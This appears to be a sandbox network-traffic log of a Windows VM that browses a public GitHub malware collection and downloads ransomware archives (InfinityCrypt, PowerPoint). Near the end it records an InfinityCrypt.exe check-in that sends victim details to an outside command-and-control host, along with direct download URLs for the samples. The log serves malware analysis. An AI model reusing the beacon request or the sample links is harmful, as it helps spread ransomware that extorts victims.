sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:22 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1715633302
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
x-github-request-id: D0E1:3F8423:B60F80:BA8B6B:66426E86
-
Remote address:20.26.156.210:443RequestPOST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 159
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:22 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1715633302
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
x-github-request-id: D0E1:3F8423:B60F63:BA8B51:66426E86
-
Remote address:20.26.156.210:443RequestPOST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 2448
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:29 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1715633309
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
x-github-request-id: D0E1:3F8423:B617B8:BA93D5:66426E86
-
Remote address:20.26.156.210:443RequestPOST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 311
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:39 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1715633319
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
x-github-request-id: D0E1:3F8423:B62338:BA9F78:66426E8D
-
Remote address:20.26.156.210:443RequestPOST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 225
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:39 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1715633319
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
x-github-request-id: D0E1:3F8423:B6237E:BA9FC9:66426E97
-
Remote address:20.26.156.210:443RequestPOST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 419
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:49 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1715633329
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
x-github-request-id: D0E1:3F8423:B62FE5:BAAC69:66426E97
-
Remote address:20.26.156.210:443RequestPOST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 1210
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:52 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1715633332
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
x-github-request-id: D0E1:3F8423:B632F0:BAAF81:66426EA1
-
Remote address:20.26.156.210:443RequestPOST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 338
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:49:17 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1715633357
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
x-github-request-id: D0E1:3F8423:B652A3:BACFE0:66426EA4
-
Remote address:8.8.8.8:53Request22.113.82.140.in-addr.arpaIN PTRResponse22.113.82.140.in-addr.arpaIN PTRlb-140-82-113-22-iadgithubcom
-
Remote address:8.8.8.8:53Request22.113.82.140.in-addr.arpaIN PTRResponse22.113.82.140.in-addr.arpaIN PTRlb-140-82-113-22-iadgithubcom
-
Remote address:8.8.8.8:53Request210.156.26.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request210.156.26.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request157.123.68.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request157.123.68.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request206.23.85.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request206.23.85.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request0.204.248.87.in-addr.arpaIN PTRResponse0.204.248.87.in-addr.arpaIN PTRhttps-87-248-204-0lhrllnwnet
-
Remote address:8.8.8.8:53Request0.204.248.87.in-addr.arpaIN PTRResponse0.204.248.87.in-addr.arpaIN PTRhttps-87-248-204-0lhrllnwnet
-
Remote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN A185.199.108.133raw.githubusercontent.comIN A185.199.111.133raw.githubusercontent.comIN A185.199.110.133raw.githubusercontent.comIN A185.199.109.133
-
GEThttps://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zipmsedge.exeRemote address:185.199.108.133:443RequestGET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/2.0
host: raw.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://github.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/zip
etag: W/"de6390105ad985b4e4a510c12633c654a71a40c5d3991362d976c82096e419a0"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 3C48:3AE8E6:2CC8F0:39734B:66426EAD
accept-ranges: bytes
date: Mon, 13 May 2024 19:49:01 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600061-LCY
x-cache: MISS
x-cache-hits: 0
x-timer: S1715629741.410736,VS0,VE152
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: dddc47ce9230c1faef6dd3dd37c2cc249ca836ba
expires: Mon, 13 May 2024 19:54:01 GMT
source-age: 0
content-length: 34300
-
GEThttps://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PowerPoint.zipmsedge.exeRemote address:185.199.108.133:443RequestGET /Endermanch/MalwareDatabase/master/ransomwares/PowerPoint.zip HTTP/2.0
host: raw.githubusercontent.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://github.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/PowerPoint.zip
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/zip
etag: W/"2239d7871f8d888fbf9c0667081e44cf94322ece10f578d7e6444f1e5df1b5c3"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 47AE:BAC00:D97CB:1029FE:66426F1B
accept-ranges: bytes
date: Mon, 13 May 2024 19:50:52 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600061-LCY
x-cache: MISS
x-cache-hits: 0
x-timer: S1715629853.740483,VS0,VE167
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 06002bed910fb94a4d8e19c64e8384c1ab24261b
expires: Mon, 13 May 2024 19:55:52 GMT
source-age: 0
content-length: 68411
-
Remote address:8.8.8.8:53Request202.121.18.2.in-addr.arpaIN PTRResponse202.121.18.2.in-addr.arpaIN PTRa2-18-121-202deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request18.107.17.2.in-addr.arpaIN PTRResponse18.107.17.2.in-addr.arpaIN PTRa2-17-107-18deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request18.107.17.2.in-addr.arpaIN PTRResponse18.107.17.2.in-addr.arpaIN PTRa2-17-107-18deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request21.236.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request21.236.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requesttse1.mm.bing.netIN AResponsetse1.mm.bing.netIN CNAMEmm-mm.bing.net.trafficmanager.netmm-mm.bing.net.trafficmanager.netIN CNAMEdual-a-0001.a-msedge.netdual-a-0001.a-msedge.netIN A204.79.197.200dual-a-0001.a-msedge.netIN A13.107.21.200
-
Remote address:8.8.8.8:53Requesttse1.mm.bing.netIN AResponsetse1.mm.bing.netIN CNAMEmm-mm.bing.net.trafficmanager.netmm-mm.bing.net.trafficmanager.netIN CNAMEdual-a-0001.a-msedge.netdual-a-0001.a-msedge.netIN A204.79.197.200dual-a-0001.a-msedge.netIN A13.107.21.200
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239381702592_1OT5ET7HCG1M9EIRY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:204.79.197.200:443RequestGET /th?id=OADD2.10239381702592_1OT5ET7HCG1M9EIRY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 476246
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D7164ED845B64E6AA5AFD334DC1E04FA Ref B: LON04EDGE1111 Ref C: 2024-05-13T19:49:49Z
date: Mon, 13 May 2024 19:49:49 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239381705588_1WA9C34P2B6OXP331&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90Remote address:204.79.197.200:443RequestGET /th?id=OADD2.10239381705588_1WA9C34P2B6OXP331&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 464243
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 207703CAF48C45E98A1E9632FEA809CB Ref B: LON04EDGE1111 Ref C: 2024-05-13T19:49:49Z
date: Mon, 13 May 2024 19:49:49 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239381702593_1BLW9LYE0FMIB48EX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:204.79.197.200:443RequestGET /th?id=OADD2.10239381702593_1BLW9LYE0FMIB48EX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 382817
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 1BDB7FFE9BC9469CBFFE1F121EDBA10D Ref B: LON04EDGE1111 Ref C: 2024-05-13T19:49:49Z
date: Mon, 13 May 2024 19:49:49 GMT
-
GEThttps://tse1.mm.bing.net/th?id=OADD2.10239381705589_1UZ6HI7DU1RQLXLFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90Remote address:204.79.197.200:443RequestGET /th?id=OADD2.10239381705589_1UZ6HI7DU1RQLXLFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
ResponseHTTP/2.0 200
content-length: 499516
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 29C6DB055EB04374B68A2E30080002BD Ref B: LON04EDGE1111 Ref C: 2024-05-13T19:49:49Z
date: Mon, 13 May 2024 19:49:49 GMT
-
Remote address:8.8.8.8:53Requestarizonacode.bplaced.netIN AResponsearizonacode.bplaced.netIN A162.55.0.137
-
Remote address:8.8.8.8:53Requestarizonacode.bplaced.netIN AResponsearizonacode.bplaced.netIN A162.55.0.137
-
GEThttp://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt%7CAdmin%7CUWFSkxXxXxHpxXxkSIjxXxMkIOxXxoyx3xXxKhPoxXx%7CMicrosoft%20Windows%2010%20Pro%7CA58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619%7C3035Endermanch@InfinityCrypt.exeRemote address:162.55.0.137:80RequestGET /rnsm/add.php?type=add&data=InfinityCrypt%7CAdmin%7CUWFSkxXxXxHpxXxkSIjxXxMkIOxXxoyx3xXxKhPoxXx%7CMicrosoft%20Windows%2010%20Pro%7CA58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619%7C3035 HTTP/1.1
Referer: http://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt|Admin|UWFSkxXxXxHpxXxkSIjxXxMkIOxXxoyx3xXxKhPoxXx|Microsoft Windows 10 Pro|A58C304B31C4497046DD2F14479FE4F6154AC2A27144F5FACB305130687CD619|3035
Host: arizonacode.bplaced.net
Connection: Keep-Alive
ResponseHTTP/1.1 403 Forbidden
Server: Apache
X-BP-NSA-REQID: (null) a.14UID=88
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Sat, 08 Oct 2022 17:29:29 GMT
ETag: "1bbf-5ea8944ceff23"
Accept-Ranges: bytes
Content-Length: 7103
Vary: Accept-Encoding
Keep-Alive: timeout=4, max=500
Content-Type: text/html
-
Remote address:8.8.8.8:53Request137.0.55.162.in-addr.arpaIN PTRResponse137.0.55.162.in-addr.arpaIN PTRmxbplacednet
-
Remote address:8.8.8.8:53Request137.0.55.162.in-addr.arpaIN PTRResponse137.0.55.162.in-addr.arpaIN PTRmxbplacednet
-
Remote address:8.8.8.8:53Requestgithub.comIN AResponsegithub.comIN A20.26.156.215
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/blob/master/ransomwares/PowerPoint.zip HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: application/json
dnt: 1
x-requested-with: XMLHttpRequest
x-github-target: dotcom
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
